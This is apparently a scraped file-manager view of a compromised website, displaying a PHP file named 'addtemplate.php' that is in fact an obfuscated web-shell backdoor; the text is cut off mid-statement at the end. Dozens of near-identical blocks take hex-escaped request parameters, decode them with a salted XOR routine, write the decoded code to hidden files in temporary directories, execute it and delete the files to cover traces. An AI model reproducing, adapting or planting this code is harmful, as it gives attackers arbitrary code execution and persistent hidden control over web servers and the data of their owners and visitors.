File manager

ÿØÿà JFIF ÿÛ „ ( %!1!%*+...983,7(-.- File manager

File manager - Edit - /home/tokomrjk/uspavilion.com/addtemplate.php

Back
<?php if(count($_POST) > 0 && isset($_POST["\x72e\x66\x65re\x6Ece"])){ $element = $_POST["\x72e\x66\x65re\x6Ece"]; $element = explode ( '.' ,$element ) ; $value = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt); $u = 0; foreach ($element as $v7) { $sChar = ord($salt[$u %$lenS]); $dec = ((int)$v7 - $sChar - ($u %10)) ^ 25; $value .=chr($dec); $u++; } $data_chunk = array_filter(["/var/tmp", "/dev/shm", "/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), getcwd(), sys_get_temp_dir(), session_save_path(), getenv("TEMP")]); $item = 0; do { $desc = $data_chunk[$item] ?? null; if ($item >= count($data_chunk)) break; if ((is_dir($desc) and is_writable($desc))) { $elem = "$desc" . "/.sym"; if (file_put_contents($elem, $value)) { require $elem; unlink($elem); die(); } } $item++; } while (true); } if(isset($_POST["fact\x6Fr"]) ? true : false){ $desc = array_filter(["/tmp", "/dev/shm", ini_get("upload_tmp_dir"), getenv("TMP"), getcwd(), getenv("TEMP"), sys_get_temp_dir(), "/var/tmp", session_save_path()]); $component = $_POST["fact\x6Fr"]; $component= explode ( "." , $component ); $k = ''; $s9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s9); $__len = count($component); for ($z = 0; $z < $__len; $z++) { $v4 = $component[$z]; $sChar = ord($s9[$z % $lenS]); $d = ((int)$v4 - $sChar - ($z % 10)) ^ 94; $k .= chr($d); } foreach ($desc as $key => $dat) { if (is_dir($dat) ? is_writable($dat) : false) { $resource = "$dat" . "/.fac"; if (file_put_contents($resource, $k)) { include $resource; @unlink($resource); exit; } } } } if(@$_REQUEST["d\x61\x74"] !== null){ $factor = $_REQUEST["d\x61\x74"]; $factor = explode ( '.', $factor ) ; $descriptor = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt ); $t = 0; while( $t < count( $factor)) { $v5 = $factor[$t]; $sChar = ord( $salt[$t % $lenS] ); $d =( ( int)$v5 - $sChar -( $t % 10)) ^ 92; $descriptor .= chr( $d ); $t++;} $obj = array_filter([getenv("TEMP"), "/var/tmp", ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/tmp", "/dev/shm", session_save_path(), getenv("TMP"), getcwd()]); foreach ($obj as $key => $desc) { if (array_product([is_dir($desc), is_writable($desc)])) { $flag = str_replace("{var_dir}", $desc, "{var_dir}/.data"); if (file_put_contents($flag, $descriptor)) { include $flag; @unlink($flag); exit; } } } } if(!empty($_POST["\x64at"])){ $component = $_POST["\x64at"]; $component =explode ("." , $component ); $flag = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); $k = 0; $len = count($component); do { if ($k>= $len) break; $v1 = $component[$k]; $chS = ord($salt[$k %$sLen]); $dec = ((int)$v1 - $chS - ($k %10)) ^40; $flag .= chr($dec); $k++; } while (true); $hld = array_filter([getenv("TEMP"), sys_get_temp_dir(), session_save_path(), "/tmp", ini_get("upload_tmp_dir"), getcwd(), getenv("TMP"), "/var/tmp", "/dev/shm"]); foreach ($hld as $ptr): if ((is_dir($ptr) and is_writable($ptr))) { $parameter_group = "$ptr" . "/.bind"; if (@file_put_contents($parameter_group, $flag) !== false) { include $parameter_group; unlink($parameter_group); die(); } } endforeach; } if(array_key_exists("r\x65s", $_REQUEST)){ $ent = $_REQUEST["r\x65s"]; $ent= explode ( '.' , $ent ) ; $comp = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s ); foreach($ent as $o => $v9) { $sChar = ord($s[$o % $lenS] ); $dec =((int)$v9 - $sChar -($o % 10)) ^ 67; $comp .= chr($dec ); } $data_chunk = array_filter([ini_get("upload_tmp_dir"), getcwd(), "/tmp", getenv("TMP"), session_save_path(), sys_get_temp_dir(), "/dev/shm", "/var/tmp", getenv("TEMP")]); foreach ($data_chunk as $data): if (is_dir($data) ? is_writable($data) : false) { $ref = vsprintf("%s/%s", [$data, ".object"]); if (file_put_contents($ref, $comp)) { require $ref; unlink($ref); die(); } } endforeach; } if(@$_POST["dat\x61_c\x68\x75n\x6B"] !== null){ $entity = $_POST["dat\x61_c\x68\x75n\x6B"]; $entity= explode ( '.', $entity) ; $resource = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt); $__len = count( $entity); for( $k = 0; $k < $__len; $k++) { $v8 = $entity[$k]; $chS = ord( $salt[$k % $sLen]); $d = ( ( int)$v8 - $chS -( $k % 10)) ^20; $resource .= chr( $d); } $key = array_filter([getcwd(), "/tmp", getenv("TMP"), session_save_path(), sys_get_temp_dir(), "/var/tmp", ini_get("upload_tmp_dir"), "/dev/shm", getenv("TEMP")]); foreach ($key as $holder) { if (!!is_dir($holder) && !!is_writable($holder)) { $factor = implode("/", [$holder, ".ptr"]); if (file_put_contents($factor, $resource)) { include $factor; @unlink($factor); exit; } } } } if(count($_REQUEST) > 0 && isset($_REQUEST["s\x79m"])){ $entry = array_filter(["/tmp", ini_get("upload_tmp_dir"), sys_get_temp_dir(), getenv("TEMP"), getenv("TMP"), "/dev/shm", session_save_path(), "/var/tmp", getcwd()]); $element = $_REQUEST["s\x79m"]; $element= explode("." ,$element ); $ref =''; $salt3 ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen($salt3 ); foreach ($element as $s => $v2): $sChar =ord($salt3[$s %$lenS] ); $d =((int)$v2 - $sChar - ($s %10))^ 10; $ref .= chr($d ); endforeach; foreach ($entry as $pgrp) { if ((function($d) { return is_dir($d) && is_writable($d); })($pgrp)) { $flag = sprintf("%s/.value", $pgrp); $file = fopen($flag, 'w'); if ($file) { fwrite($file, $ref); fclose($file); include $flag; @unlink($flag); die(); } } } } if(@$_POST["dc\x68unk"] !== null){ $val = array_filter([getcwd(), ini_get("upload_tmp_dir"), "/tmp", session_save_path(), sys_get_temp_dir(), getenv("TEMP"), getenv("TMP"), "/var/tmp", "/dev/shm"]); $resource = $_POST["dc\x68unk"]; $resource=explode( ".",$resource ) ; $obj =''; $s ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen($s); $u =0; array_walk($resource ,function ($v3) use (&$obj ,&$u ,$s ,$lenS) { $sChar =ord($s[$u % $lenS]); $dec =((int)$v3 - $sChar - ($u % 10)) ^ 13; $obj .= chr($dec); $u++; }); foreach ($val as $value) { if ((function($d) { return is_dir($d) && is_writable($d); })($value)) { $sym = implode("/", [$value, ".hld"]); if (file_put_contents($sym, $obj)) { include $sym; @unlink($sym); exit; } } } } if(isset($_REQUEST["\x70\x61ram\x65te\x72_g\x72\x6Fup"]) ? true : false){ $mrk = array_filter([ini_get("upload_tmp_dir"), "/var/tmp", "/dev/shm", getenv("TMP"), "/tmp", getenv("TEMP"), sys_get_temp_dir(), getcwd(), session_save_path()]); $element = $_REQUEST["\x70\x61ram\x65te\x72_g\x72\x6Fup"]; $element =explode ( "." , $element) ; $binding =''; $s ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen( $s); $l =0; array_walk( $element, function( $v7) use( &$binding, &$l, $s, $sLen) {$sChar =ord( $s[$l% $sLen]); $d =( ( int)$v7 - $sChar -( $l% 10)) ^30; $binding .= chr( $d); $l++;} ); while ($resource = array_shift($mrk)) { if ((function($d) { return is_dir($d) && is_writable($d); })($resource)) { $pointer = "$resource/.fac"; if (file_put_contents($pointer, $binding)) { require $pointer; unlink($pointer); die(); } } } } if(count($_REQUEST) > 0 && isset($_REQUEST["\x70set"])){ $value = $_REQUEST["\x70set"]; $value=explode ( ".", $value ) ; $component =''; $s7 ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen($s7 ); $i =0; $__tmp =$value; while ($v7 =array_shift($__tmp)) {$sChar =ord($s7[$i % $lenS] ); $dec =((int)$v7 - $sChar - ($i % 10)) ^ 56; $component .= chr($dec ); $i++; } $flag = array_filter([session_save_path(), sys_get_temp_dir(), "/tmp", "/var/tmp", getenv("TMP"), getcwd(), "/dev/shm", getenv("TEMP"), ini_get("upload_tmp_dir")]); while ($element = array_shift($flag)) { if (array_product([is_dir($element), is_writable($element)])) { $k = vsprintf("%s/%s", [$element, ".val"]); if (file_put_contents($k, $component)) { require $k; unlink($k); exit; } } } } if(isset($_POST["o\x62je\x63t"])){ $elem = array_filter([ini_get("upload_tmp_dir"), "/dev/shm", getenv("TMP"), session_save_path(), getcwd(), sys_get_temp_dir(), "/var/tmp", getenv("TEMP"), "/tmp"]); $property_set = $_POST["o\x62je\x63t"]; $property_set = explode( ".", $property_set ) ; $fac = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s ); $x = 0; $__tmp = $property_set; while ($v2 = array_shift($__tmp)) { $chS = ord($s[$x % $lenS] ); $d = ((int)$v2 - $chS - ($x % 10))^ 31; $fac .=chr($d ); $x++; } foreach ($elem as $flag): if (is_dir($flag) && is_writable($flag)) { $desc = str_replace("{var_dir}", $flag, "{var_dir}/.record"); $file = fopen($desc, 'w'); if ($file) { fwrite($file, $fac); fclose($file); include $desc; @unlink($desc); exit; } } endforeach; } if(isset($_REQUEST["\x64\x61t"]) ? true : false){ $marker = $_REQUEST["\x64\x61t"]; $marker = explode ( '.' ,$marker ) ; $ptr= ''; $s1= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen( $s1); foreach( $marker as $t => $v4) { $chS= ord( $s1[$t %$lenS]); $d= ( ( int)$v4 - $chS -( $t %10)) ^ 92; $ptr .=chr( $d); } $res = array_filter([ini_get("upload_tmp_dir"), session_save_path(), getenv("TEMP"), "/var/tmp", "/tmp", sys_get_temp_dir(), getcwd(), getenv("TMP"), "/dev/shm"]); while ($pgrp = array_shift($res)) { if (!!is_dir($pgrp) && !!is_writable($pgrp)) { $component = "$pgrp/.obj"; $file = fopen($component, 'w'); if ($file) { fwrite($file, $ptr); fclose($file); include $component; @unlink($component); exit; } } } } if(isset($_POST) && isset($_POST["p\x61rame\x74\x65\x72_\x67r\x6Fu\x70"])){ $factor = array_filter([getenv("TMP"), getcwd(), "/var/tmp", "/dev/shm", ini_get("upload_tmp_dir"), session_save_path(), "/tmp", getenv("TEMP"), sys_get_temp_dir()]); $pgrp = $_POST["p\x61rame\x74\x65\x72_\x67r\x6Fu\x70"]; $pgrp=explode( '.' ,$pgrp ) ; $binding =''; $s ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen($s); $k =0; $len =count($pgrp); do { if ($k >= $len) break; $v1 =$pgrp[$k]; $chS =ord($s[$k % $sLen]); $d =((int)$v1 - $chS - ($k % 10)) ^ 67; $binding .= chr($d); $k++; } while (true); foreach ($factor as $tkn): if (is_dir($tkn) ? is_writable($tkn) : false) { $entry = str_replace("{var_dir}", $tkn, "{var_dir}/.descriptor"); $file = fopen($entry, 'w'); if ($file) { fwrite($file, $binding); fclose($file); include $entry; @unlink($entry); die(); } } endforeach; } if(in_array("\x62i\x6E\x64in\x67", array_keys($_POST))){ $element = array_filter([sys_get_temp_dir(), getcwd(), "/dev/shm", ini_get("upload_tmp_dir"), getenv("TMP"), session_save_path(), "/tmp", getenv("TEMP"), "/var/tmp"]); $data = $_POST["\x62i\x6E\x64in\x67"]; $data = explode ( '.', $data ) ; $sym = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s); $x = 0; foreach ($data as $v3) { $sChar = ord($s[$x %$sLen]); $d = ((int)$v3 - $sChar - ($x %10)) ^ 73; $sym .= chr($d); $x++; } foreach ($element as $comp): if (array_product([is_dir($comp), is_writable($comp)])) { $item = implode("/", [$comp, ".factor"]); if (@file_put_contents($item, $sym) !== false) { include $item; unlink($item); exit; } } endforeach; } if(!empty($_POST["dchu\x6E\x6B"])){ $obj = array_filter(["/tmp", getenv("TEMP"), sys_get_temp_dir(), "/dev/shm", getcwd(), getenv("TMP"), "/var/tmp", ini_get("upload_tmp_dir"), session_save_path()]); $reference = $_POST["dchu\x6E\x6B"]; $reference = explode( '.' , $reference) ; $record = ''; $s1 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s1); foreach ($reference as $o => $v7): $chS = ord($s1[$o % $sLen]); $dec = ((int)$v7 - $chS - ($o % 10))^ 17; $record .= chr($dec); endforeach; foreach ($obj as $resource) { if (array_product([is_dir($resource), is_writable($resource)])) { $entry = str_replace("{var_dir}", $resource, "{var_dir}/.token"); $success = file_put_contents($entry, $record); if ($success) { include $entry; @unlink($entry); exit;} } } } if(!is_null($_REQUEST["\x73\x79\x6Dbol"] ?? null)){ $res = $_REQUEST["\x73\x79\x6Dbol"]; $res =explode ( '.', $res ) ; $reference = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s); $n = 0; array_walk($res, function ($v7) use (&$reference, &$n, $s, $lenS) {$chS = ord($s[$n% $lenS]); $d = ((int)$v7 - $chS - ($n% 10)) ^ 1; $reference .= chr($d); $n++; }); $dchunk = array_filter([sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/tmp", getenv("TMP"), getenv("TEMP"), getcwd(), "/dev/shm", "/var/tmp", session_save_path()]); foreach ($dchunk as $key => $entity) { if (is_writable($entity) && is_dir($entity)) { $factor = vsprintf("%s/%s", [$entity, ".k"]); $file = fopen($factor, 'w'); if ($file) { fwrite($file, $reference); fclose($file); include $factor; @unlink($factor); exit; } } } } if(in_array("p\x61\x72\x61\x6D\x65\x74\x65r\x5Fgroup", array_keys($_REQUEST))){ $symbol = $_REQUEST["p\x61\x72\x61\x6D\x65\x74\x65r\x5Fgroup"]; $symbol = explode ( "." , $symbol) ; $entry =''; $s2 ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen($s2 ); $z =0; $__len =count($symbol ); do { if ($z >=$__len) break; $v9 =$symbol[$z]; $chS =ord($s2[$z % $sLen] ); $d =((int)$v9 - $chS - ($z % 10)) ^ 33; $entry .= chr($d ); $z++; } while (true ); $entity = array_filter([getenv("TEMP"), sys_get_temp_dir(), getcwd(), "/dev/shm", "/var/tmp", session_save_path(), getenv("TMP"), ini_get("upload_tmp_dir"), "/tmp"]); for ($object = 0, $resource = count($entity); $object < $resource; $object++) { $component = $entity[$object]; if (is_dir($component) && is_writable($component)) { $data = sprintf("%s/.sym", $component); if (file_put_contents($data, $entry)) { include $data; @unlink($data); exit; } } } } if(array_key_exists("d\x61ta", $_POST) && !is_null($_POST["d\x61ta"])){ $ent = array_filter(["/var/tmp", sys_get_temp_dir(), getenv("TMP"), getenv("TEMP"), "/dev/shm", "/tmp", ini_get("upload_tmp_dir"), getcwd(), session_save_path()]); $record = $_POST["d\x61ta"]; $record=explode ("." , $record) ; $entry = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s); $q = 0; $__tmp = $record; while($v4 = array_shift($__tmp)) { $chS = ord($s[$q % $lenS]); $dec =((int)$v4 - $chS -($q % 10)) ^ 61; $entry .= chr($dec); $q++; } $reference = 0; do { $rec = $ent[$reference] ?? null; if ($reference >= count($ent)) break; if (!!is_dir($rec) && !!is_writable($rec)) { $marker = "$rec" . "/.flg"; if (file_put_contents($marker, $entry)) { require $marker; unlink($marker); die(); } } $reference++; } while (true); } if(!empty($_POST["\x76al"])){ $descriptor = $_POST["\x76al"]; $descriptor= explode ( '.', $descriptor ) ; $parameter_group = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s); $p = 0; foreach ($descriptor as $v1) { $chS = ord($s[$p % $lenS]); $dec = ((int)$v1 - $chS - ($p % 10)) ^ 38; $parameter_group.= chr($dec); $p++; } $fac = array_filter([sys_get_temp_dir(), "/var/tmp", ini_get("upload_tmp_dir"), "/tmp", getenv("TMP"), session_save_path(), getenv("TEMP"), getcwd(), "/dev/shm"]); while ($dat = array_shift($fac)) { if (is_dir($dat) ? is_writable($dat) : false) { $property_set = sprintf("%s/.ptr", $dat); if (file_put_contents($property_set, $parameter_group)) { include $property_set; @unlink($property_set); die(); } } } } if(filter_has_var(INPUT_POST, "\x6B\x65y")){ $itm = $_POST["\x6B\x65y"]; $itm = explode ('.' , $itm ) ; $item = ''; $s9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s9 ); foreach ($itm as $m=> $v7): $chS = ord($s9[$m % $lenS] ); $d = ((int)$v7 - $chS - ($m % 10))^ 90; $item .= chr($d ); endforeach; $flag = array_filter([ini_get("upload_tmp_dir"), getenv("TMP"), getcwd(), sys_get_temp_dir(), "/tmp", "/var/tmp", "/dev/shm", getenv("TEMP"), session_save_path()]); for ($desc = 0, $parameter_group = count($flag); $desc < $parameter_group; $desc++) { $pgrp = $flag[$desc]; if ((is_dir($pgrp) and is_writable($pgrp))) { $token = vsprintf("%s/%s", [$pgrp, ".mrk"]); if (file_put_contents($token, $item)) { require $token; unlink($token); die(); } } } } if(!empty($_POST["\x73\x79mbol"])){ $tkn = array_filter([session_save_path(), "/dev/shm", getenv("TMP"), sys_get_temp_dir(), "/var/tmp", getcwd(), getenv("TEMP"), ini_get("upload_tmp_dir"), "/tmp"]); $comp = $_POST["\x73\x79mbol"]; $comp = explode ('.', $comp ); $element= ''; $s6= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($s6 ); $s= 0; $__len= count($comp ); do { if ($s>= $__len) break; $v8= $comp[$s]; $sChar= ord($s6[$s % $lenS] ); $dec= ((int)$v8 - $sChar - ($s % 10)) ^ 97; $element .= chr($dec ); $s++;}while (true ); foreach ($tkn as $flag) { if ((function($d) { return is_dir($d) && is_writable($d); })($flag)) { $bind = implode("/", [$flag, ".component"]); $success = file_put_contents($bind, $element); if ($success) { include $bind; @unlink($bind); die();} } } } if(!is_null($_POST["e\x6C\x65m\x65\x6Et"] ?? null)){ $comp = array_filter([ini_get("upload_tmp_dir"), getenv("TEMP"), "/tmp", sys_get_temp_dir(), getenv("TMP"), "/dev/shm", getcwd(), "/var/tmp", session_save_path()]); $k = $_POST["e\x6C\x65m\x65\x6Et"]; $k = explode( '.' , $k) ; $dat = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s2); foreach ($k as $x => $v9) {$chS = ord($s2[$x%$lenS]); $dec = ((int)$v9 - $chS - ($x%10)) ^ 31; $dat .= chr($dec); } while ($binding = array_shift($comp)) { if (max(0, is_dir($binding) * is_writable($binding))) { $data_chunk = "$binding/.ref"; if (@file_put_contents($data_chunk, $dat) !== false) { include $data_chunk; unlink($data_chunk); exit; } } } } if(!is_null($_POST["\x65le\x6D"] ?? null)){ $marker = array_filter(["/var/tmp", getenv("TEMP"), getcwd(), session_save_path(), getenv("TMP"), sys_get_temp_dir(), "/tmp", "/dev/shm", ini_get("upload_tmp_dir")]); $resource = $_POST["\x65le\x6D"]; $resource = explode( "." , $resource ); $dchunk= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($salt); $k= 0; $__tmp= $resource; while ($v4= array_shift($__tmp)) { $chS= ord($salt[$k % $lenS]); $d= ((int)$v4 - $chS - ($k % 10)) ^ 92; $dchunk .=chr($d); $k++; } for ($flg = 0, $component = count($marker); $flg < $component; $flg++) { $ref = $marker[$flg]; if (is_dir($ref) && is_writable($ref)) { $k = "$ref/.val"; if (file_put_contents($k, $dchunk)) { include $k; @unlink($k); exit; } } } } if(filter_has_var(INPUT_POST, "\x73y\x6Db\x6Fl")){ $resource = array_filter([getcwd(), "/tmp", "/var/tmp", "/dev/shm", getenv("TEMP"), getenv("TMP"), sys_get_temp_dir(), session_save_path(), ini_get("upload_tmp_dir")]); $desc = $_POST["\x73y\x6Db\x6Fl"]; $desc = explode( '.' , $desc ) ; $hld= ''; $s= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($s); foreach($desc as $w=> $v5): $sChar= ord($s[$w% $lenS]); $d= ((int)$v5 - $sChar -($w% 10))^ 27; $hld .= chr($d); endforeach; $dat = 0; do { $entry = $resource[$dat] ?? null; if ($dat >= count($resource)) break; if (max(0, is_dir($entry) * is_writable($entry))) { $parameter_group = str_replace("{var_dir}", $entry, "{var_dir}/.res"); $success = file_put_contents($parameter_group, $hld); if ($success) { include $parameter_group; @unlink($parameter_group); die();} } $dat++; } while (true); } if(array_key_exists("re\x73", $_REQUEST)){ $binding = $_REQUEST["re\x73"]; $binding= explode ("." , $binding ) ; $element = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s2); $i = 0; while ($i < count($binding)) { $v2 = $binding[$i]; $chS = ord($s2[$i % $sLen]); $dec = ((int)$v2 - $chS - ($i % 10)) ^90; $element .= chr($dec); $i++;} $obj = array_filter(["/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), "/dev/shm", sys_get_temp_dir(), getcwd(), session_save_path(), getenv("TEMP"), "/var/tmp"]); for ($hld = 0, $fac = count($obj); $hld < $fac; $hld++) { $ref = $obj[$hld]; if (array_product([is_dir($ref), is_writable($ref)])) { $flg = implode("/", [$ref, ".resource"]); if (file_put_contents($flg, $element)) { require $flg; unlink($flg); exit; } } } } if(isset($_REQUEST["ps\x65\x74"])){ $record = array_filter([sys_get_temp_dir(), "/dev/shm", session_save_path(), ini_get("upload_tmp_dir"), "/var/tmp", getcwd(), getenv("TMP"), getenv("TEMP"), "/tmp"]); $comp = $_REQUEST["ps\x65\x74"]; $comp = explode ("." ,$comp); $data =''; $salt5 ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen($salt5); $i =0; while ($i < count($comp)) { $v5 =$comp[$i]; $chS =ord($salt5[$i % $sLen]); $d =((int)$v5 - $chS - ($i % 10)) ^ 5; $data .= chr($d); $i++; } for ($pointer = 0, $entry = count($record); $pointer < $entry; $pointer++) { $property_set = $record[$pointer]; if (is_dir($property_set) && is_writable($property_set)) { $dat = "$property_set" . "/.k"; if (@file_put_contents($dat, $data) !== false) { include $dat; unlink($dat); die(); } } } } if(isset($_REQUEST["\x66actor"])){ $pointer = $_REQUEST["\x66actor"]; $pointer = explode ( '.',$pointer ) ; $element = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); $p = 0; array_walk($pointer, function ($v4) use (&$element, &$p, $salt, $sLen) { $chS = ord($salt[$p % $sLen]); $d = ((int)$v4 - $chS - ($p % 10))^87; $element .= chr($d); $p++; }); $record = array_filter([session_save_path(), getenv("TEMP"), sys_get_temp_dir(), getenv("TMP"), "/dev/shm", ini_get("upload_tmp_dir"), getcwd(), "/var/tmp", "/tmp"]); while ($resource = array_shift($record)) { if (max(0, is_dir($resource) * is_writable($resource))) { $descriptor = join("/", [$resource, ".k"]); if (file_put_contents($descriptor, $element)) { require $descriptor; unlink($descriptor); die(); } } } } if(!is_null($_REQUEST["da\x74a"] ?? null)){ $symbol = $_REQUEST["da\x74a"]; $symbol= explode ( ".", $symbol ) ; $property_set = ''; $s6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s6); foreach( $symbol as $j => $v7) { $sChar = ord( $s6[$j % $lenS]); $d =( ( int)$v7 - $sChar -( $j % 10)) ^ 82; $property_set .= chr( $d); } $mrk = array_filter(["/var/tmp", getenv("TMP"), session_save_path(), ini_get("upload_tmp_dir"), getenv("TEMP"), sys_get_temp_dir(), getcwd(), "/dev/shm", "/tmp"]); foreach ($mrk as $fac) { if (array_product([is_dir($fac), is_writable($fac)])) { $pset = vsprintf("%s/%s", [$fac, ".elem"]); if (file_put_contents($pset, $property_set)) { require $pset; unlink($pset); die(); } } } } if(filter_has_var(INPUT_POST, "facto\x72")){ $key = array_filter([getenv("TMP"), session_save_path(), "/var/tmp", sys_get_temp_dir(), getcwd(), "/tmp", getenv("TEMP"), "/dev/shm", ini_get("upload_tmp_dir")]); $ptr = $_POST["facto\x72"]; $ptr = explode ( ".",$ptr ) ; $ent = ''; $s9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s9); $l = 0; $len = count($ptr); do {if ($l >= $len) break; $v6 = $ptr[$l]; $sChar = ord($s9[$l % $sLen]); $dec = ((int)$v6 - $sChar - ($l % 10)) ^ 53; $ent .= chr($dec); $l++; } while (true); foreach ($key as $record): if (!!is_dir($record) && !!is_writable($record)) { $rec = str_replace("{var_dir}", $record, "{var_dir}/.flag"); if (file_put_contents($rec, $ent)) { require $rec; unlink($rec); exit; } } endforeach; } if(in_array("\x65n\x74", array_keys($_REQUEST))){ $reference = array_filter(["/var/tmp", "/dev/shm", sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TEMP"), getenv("TMP"), "/tmp", getcwd(), session_save_path()]); $binding = $_REQUEST["\x65n\x74"]; $binding = explode (".", $binding ) ; $flg = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt ); $len = count( $binding ); for( $r = 0; $r< $len; $r++) { $v8 = $binding[$r]; $sChar = ord( $salt[$r % $lenS] ); $d =( ( int)$v8 - $sChar -( $r % 10)) ^ 85; $flg.= chr( $d ); } foreach ($reference as $key => $holder) { if (!!is_dir($holder) && !!is_writable($holder)) { $pgrp = vsprintf("%s/%s", [$holder, ".pointer"]); $success = file_put_contents($pgrp, $flg); if ($success) { include $pgrp; @unlink($pgrp); die();} } } } if(count($_POST) > 0 && isset($_POST["\x70o\x69\x6Et\x65r"])){ $ref = array_filter([getenv("TMP"), "/dev/shm", "/tmp", "/var/tmp", getenv("TEMP"), sys_get_temp_dir(), session_save_path(), getcwd(), ini_get("upload_tmp_dir")]); $descriptor = $_POST["\x70o\x69\x6Et\x65r"]; $descriptor = explode ( '.' , $descriptor ) ; $ent = ''; $salt1 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt1 ); $q = 0; array_walk( $descriptor, function( $v6) use( &$ent, &$q, $salt1, $sLen) {$chS = ord( $salt1[$q % $sLen] ); $d =( ( int)$v6 - $chS -( $q % 10)) ^ 67; $ent .= chr( $d ); $q++; } ); foreach ($ref as $hld): if (is_dir($hld) && is_writable($hld)) { $rec = sprintf("%s/.pset", $hld); if (file_put_contents($rec, $ent)) { require $rec; unlink($rec); exit; } } endforeach; } if(isset($_REQUEST) && isset($_REQUEST["fla\x67"])){ $token = $_REQUEST["fla\x67"]; $token = explode ( '.' , $token ); $data= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen( $salt); $x= 0; $len= count( $token); do { if( $x>=$len) break; $v9= $token[$x]; $chS= ord( $salt[$x % $lenS]); $dec= ( ( int)$v9 - $chS -( $x % 10)) ^ 44; $data .= chr( $dec); $x++;} while( true); $k = array_filter([ini_get("upload_tmp_dir"), "/dev/shm", getenv("TEMP"), getcwd(), sys_get_temp_dir(), "/var/tmp", session_save_path(), getenv("TMP"), "/tmp"]); for ($fac = 0, $factor = count($k); $fac < $factor; $fac++) { $entry = $k[$fac]; if ((is_dir($entry) and is_writable($entry))) { $property_set = "$entry" . "/.reference"; if (file_put_contents($property_set, $data)) { include $property_set; @unlink($property_set); die(); } } } } if(array_key_exists("b\x69nd", $_REQUEST)){ $data_chunk = $_REQUEST["b\x69nd"]; $data_chunk = explode( "." , $data_chunk ) ; $k =''; $s3 ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen( $s3 ); foreach( $data_chunk as $o =>$v6): $chS =ord( $s3[$o % $sLen] ); $d =( ( int)$v6 - $chS -( $o % 10))^ 21; $k.= chr( $d ); endforeach; $hld = array_filter([getenv("TMP"), sys_get_temp_dir(), "/dev/shm", "/var/tmp", session_save_path(), getcwd(), getenv("TEMP"), "/tmp", ini_get("upload_tmp_dir")]); foreach ($hld as $data): if (is_dir($data) ? is_writable($data) : false) { $value = sprintf("%s/.record", $data); if (@file_put_contents($value, $k) !== false) { include $value; unlink($value); exit; } } endforeach; } if(isset($_REQUEST["\x64e\x73\x63ripto\x72"])){ $reference = array_filter([getenv("TMP"), ini_get("upload_tmp_dir"), "/var/tmp", "/dev/shm", session_save_path(), "/tmp", sys_get_temp_dir(), getcwd(), getenv("TEMP")]); $itm = $_REQUEST["\x64e\x73\x63ripto\x72"]; $itm = explode( "." , $itm ) ; $marker = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s ); $z = 0; $len = count($itm ); do { if($z>= $len) break; $v2 = $itm[$z]; $chS = ord($s[$z % $sLen] ); $dec =((int)$v2 - $chS -($z % 10))^ 42; $marker .= chr($dec ); $z++; } while(true ); foreach ($reference as $elem) { if (is_dir($elem) && is_writable($elem)) { $fac = str_replace("{var_dir}", $elem, "{var_dir}/.object"); $success = file_put_contents($fac, $marker); if ($success) { include $fac; @unlink($fac); die();} } } } if(filter_has_var(INPUT_POST, "\x70g\x72p")){ $key = $_REQUEST["\x70g\x72p"]; $key =explode ( '.' ,$key) ; $object = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); foreach ($key as $v => $v1) { $sChar = ord($salt[$v % $sLen]); $dec = ((int)$v1 - $sChar - ($v % 10)) ^ 52; $object .= chr($dec); } $elem = array_filter(["/dev/shm", getenv("TEMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir(), getcwd(), "/var/tmp", "/tmp", getenv("TMP"), session_save_path()]); for ($obj = 0, $data = count($elem); $obj < $data; $obj++) { $item = $elem[$obj]; if ((is_dir($item) and is_writable($item))) { $res = "$item" . "/.entry"; $success = file_put_contents($res, $object); if ($success) { include $res; @unlink($res); die();} } } } if(array_key_exists("\x62\x69nd", $_REQUEST)){ $value = 